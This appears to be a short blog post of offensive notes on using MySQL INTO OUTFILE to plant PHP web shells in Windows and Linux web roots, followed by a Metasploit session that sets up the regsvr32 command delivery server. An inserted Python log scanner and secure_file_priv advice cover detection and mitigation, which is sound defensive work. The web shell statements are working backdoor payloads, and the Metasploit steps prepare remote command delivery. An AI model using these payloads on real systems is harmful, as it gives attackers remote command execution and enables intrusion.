Tuesday, May 25, 2021

MySQL privilege escalation

For Windows:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php";

For Linux:

SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";
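
Detection side of the two statements above, as an added example that is not part of the original notes: a Python scan of MySQL general query log lines that flags INTO OUTFILE / INTO DUMPFILE targets under a web root or ending in a server-side script extension. The log lines, the web-root list and the extension list are constructed assumptions; adjust them to the hosts being monitored.

```python
import re

# Matches the file target of SELECT ... INTO OUTFILE/DUMPFILE '<path>'.
OUTFILE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(.+?)\1", re.I)
# Assumed web roots and script extensions (not taken from any product default list).
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/",
             "c:/xampp/htdocs/", "c:/inetpub/wwwroot/")
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx")

def normalize(path):
    """Lower-case, turn (escaped) backslashes into '/', collapse repeats."""
    return re.sub(r"/+", "/", path.replace("\\", "/")).lower()

def scan(lines):
    """Return (line_number, target_path, reasons) for suspicious file writes."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = OUTFILE_RE.search(line)
        if not m:
            continue
        path = normalize(m.group(2))
        reasons = []
        if path.startswith(WEB_ROOTS):
            reasons.append("web-root")
        if path.endswith(SCRIPT_EXTS):
            reasons.append("script-extension")
        if reasons:
            findings.append((n, path, reasons))
    return findings

# Constructed sample lines in the style of the MySQL general query log.
SAMPLE_LOG = [
    "2021-05-25T10:00:01Z\t 12 Query\tSELECT * FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2021-05-25T10:02:17Z\t 14 Query\tselect 'x' into outfile \"C:\\\\xampp\\\\htdocs\\\\test.php\"",
    "2021-05-25T10:03:40Z\t 14 Query\tSELECT 'x' INTO DUMPFILE '/var/www/html/uploads/a.php'",
    "2021-05-25T10:04:02Z\t 15 Query\tSELECT name FROM users WHERE id = 7",
]

if __name__ == "__main__":
    for n, path, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {path} ({', '.join(reasons)})")
```

These writes only succeed when the account holds the FILE privilege and secure_file_priv allows the target directory, so pointing secure_file_priv at a dedicated directory outside the web root and revoking FILE from application accounts blocks them at the source.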



msf6 > search regsvr32

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/server/regsvr32_command_delivery_server                   normal  No     Regsvr32.exe (.sct) Command Delivery Server
   1  exploit/multi/script/web_delivery                  2013-07-19       manual  No     Script Web Delivery


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery

msf6 > use 0
msf6 auxiliary(server/regsvr32_command_delivery_server) > show options

Module options (auxiliary/server/regsvr32_command_delivery_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD                       no        The command to execute
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVPORT 4444
SRVPORT => 4444
